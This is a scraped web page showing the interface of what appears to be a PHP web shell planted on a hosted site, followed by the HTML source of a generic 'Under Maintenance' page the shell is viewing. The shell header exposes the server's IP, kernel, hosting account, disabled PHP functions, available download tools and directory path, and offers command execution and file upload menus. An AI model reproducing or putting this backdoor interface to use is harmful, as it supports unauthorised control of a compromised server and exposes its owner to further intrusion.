|
Server IP : 2a02:4780:3:2287:0:3736:a38e:8 / Your IP : 216.73.217.88 Web Server : LiteSpeed System : Linux sg-nme-web2187.main-hosting.eu 5.14.0-611.54.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed May 6 18:03:03 EDT 2026 x86_64 User : u926327694 ( 926327694) PHP Version : 7.4.33 Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail, proc_open MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF Directory (0755) : /home/u926327694/domains/smsoft.in/public_html/demo/Downloads/../accounts/../../smart/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Under Maintenance</title>
<style>
* {
box-sizing: border-box;
margin: 0;
padding: 0;
}
body {
min-height: 100vh;
display: flex;
align-items: center;
justify-content: center;
font-family: Arial, sans-serif;
background: #f5f7fb;
color: #222;
text-align: center;
padding: 20px;
}
.maintenance {
max-width: 520px;
width: 100%;
background: #fff;
padding: 45px 30px;
border-radius: 16px;
box-shadow: 0 10px 35px rgba(0,0,0,0.08);
}
.icon {
font-size: 60px;
margin-bottom: 20px;
}
h1 {
font-size: 30px;
margin-bottom: 12px;
}
p {
color: #666;
font-size: 16px;
line-height: 1.6;
}
.small {
margin-top: 20px;
font-size: 14px;
color: #999;
}
@media (max-width: 480px) {
.maintenance {
padding: 35px 20px;
}
h1 {
font-size: 25px;
}
}
</style>
</head>
<body>
<div class="maintenance">
<div class="icon">🛠️</div>
<h1>We'll Be Back Soon</h1>
<p>
Our website is currently under maintenance.
We're working to improve your experience.
</p>
<p class="small">
Thank you for your patience and understanding.
</p>
</div>
</body>
</html>